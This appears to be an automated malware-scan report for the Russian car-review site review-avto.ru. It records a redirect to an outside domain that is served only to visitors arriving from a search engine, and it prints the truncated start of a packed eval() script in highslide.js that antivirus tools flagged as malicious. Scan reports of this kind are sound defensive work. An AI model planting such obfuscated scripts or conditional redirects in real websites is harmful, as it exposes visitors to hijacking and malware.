Malicious/Suspicious Redirects
Request:
URL: http://review-avto.ru/ (imitation of visitor from search engine)
GET / HTTP/1.1
Host: review-avto.ru
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 11:05:28 GMT
Pragma: no-cache
Location: http://site.portrelay.com/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2d1uq9g1jhutvtojh09urh52e1; path=/
X-Powered-By: PHP/5.3.3-7+squeeze8

Status: malicious
Scanned pages/files
Request | Server response | Status |
http://review-avto.ru/ | 200 OK Content-Length: 30258 Content-Type: text/html | clean |
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&g=general&5 | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
http://review-avto.ru/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&5 | 200 OK Content-Length: 32882 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('q(!m){u m={Y:{8G:\'8i\',8k:\'a9...\',8l:\'6w 1E 9X\',8g:\'6w 1E af 1E aa\',6n:\'a2 1E a7 B (f)\',7F:\'a4 by <i>8L 8P</i>\',7R:\'a6 1E a0 8L 8P at\',9Q:\
Antivirus reports:
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://crackac.com/60rb4e1/5497 | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?1763990 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=review-avto.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://review-avto.ru/
Result: review-avto.ru is not infected or malware details are not published yet.